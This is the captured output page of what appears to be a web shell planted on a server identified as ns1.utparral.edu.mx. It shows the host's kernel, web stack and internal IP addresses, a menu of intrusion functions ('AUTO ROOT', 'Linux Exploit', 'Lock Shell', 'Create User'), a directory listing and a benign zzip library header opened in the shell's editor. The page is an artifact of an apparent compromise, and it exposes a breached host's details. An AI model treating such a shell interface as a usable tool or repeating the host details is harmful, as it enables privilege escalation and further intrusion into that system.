Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
opt /
lampp /
include /
zzip /
[ HOME SHELL ]
Name
Size
Permission
Action
autoconf.h
1.34
KB
-rw-r--r--
conf.h
6.09
KB
-rw-r--r--
_config.h
6.62
KB
-rw-r--r--
fetch.h
19.73
KB
-rw-r--r--
file.h
2.14
KB
-rw-r--r--
format.h
8.88
KB
-rw-r--r--
fseeko.h
3.74
KB
-rw-r--r--
info.h
774
B
-rw-r--r--
lib.h
2.86
KB
-rw-r--r--
memdisk.h
6.03
KB
-rw-r--r--
mmapped.h
4.06
KB
-rw-r--r--
_msvc.h
6.19
KB
-rw-r--r--
plugin.h
3.21
KB
-rw-r--r--
stdint.h
1.56
KB
-rw-r--r--
types.h
2.11
KB
-rw-r--r--
wrap.h
777
B
-rw-r--r--
write.h
2.31
KB
-rw-r--r--
zzip32.h
1.24
KB
-rw-r--r--
zzip.h
7.86
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : types.h
/* * unlike in <zzip/conf.h> we are allowed to make up typedefs here, * while over there only #defines are allowed * * Author: * Guido Draheim <guidod@gmx.de> * * Copyright (c) 2003,2004 Guido Draheim * All rights reserved, * usage allowed under the restrictions of the * Lesser GNU General Public License * or alternatively the restrictions * of the Mozilla Public License 1.1 * * This file is usually the first to define some real symbols. If you do * see some errors here then it is most likely the includepath is wrong * or some includeheader is missing / unreadable on your system. * (a) we include local headers with a "zzip/" prefix just to be sure * to not actually get the wrong one. Consider to add `-I..` somewhere * and especially VC/IDE users (who make up their own workspace files) * should include the root source directory of this project. * (b) size_t and ssize_t are sometimes found be `configure` but they are * not in the usual places (ANSI C = stddef.h; UNIX = sys/types.h), so * be sure to look for them and add the respective header as an #include. */ #ifndef _ZZIP_TYPES_H_ #define _ZZIP_TYPES_H_ #include <zzip/conf.h> #include <fcntl.h> #include <stddef.h> /* size_t and friends */ #ifdef ZZIP_HAVE_SYS_TYPES_H #include <sys/types.h> /* bsd (mac) has size_t here */ #endif /* msvc6 has neither ssize_t (we assume "int") nor off_t (assume "long") */ typedef unsigned char zzip_byte_t; // especially zlib decoding data typedef _zzip_off64_t zzip_off64_t; typedef _zzip_off_t zzip_off_t; typedef _zzip_size_t zzip_size_t; /* Some error here? */ typedef _zzip_ssize_t zzip_ssize_t; /* See notes above! */ /* in <zzip/format.h> */ typedef struct zzip_disk64_trailer ZZIP_DISK64_TRAILER; typedef struct zzip_disk_trailer ZZIP_DISK_TRAILER; typedef struct zzip_file_trailer ZZIP_FILE_TRAILER; typedef struct zzip_root_dirent ZZIP_ROOT_DIRENT; typedef struct zzip_file_header ZZIP_FILE_HEADER; typedef struct zzip_disk_entry ZZIP_DISK_ENTRY; typedef struct zzip_extra_block ZZIP_EXTRA_BLOCK; #endif
Close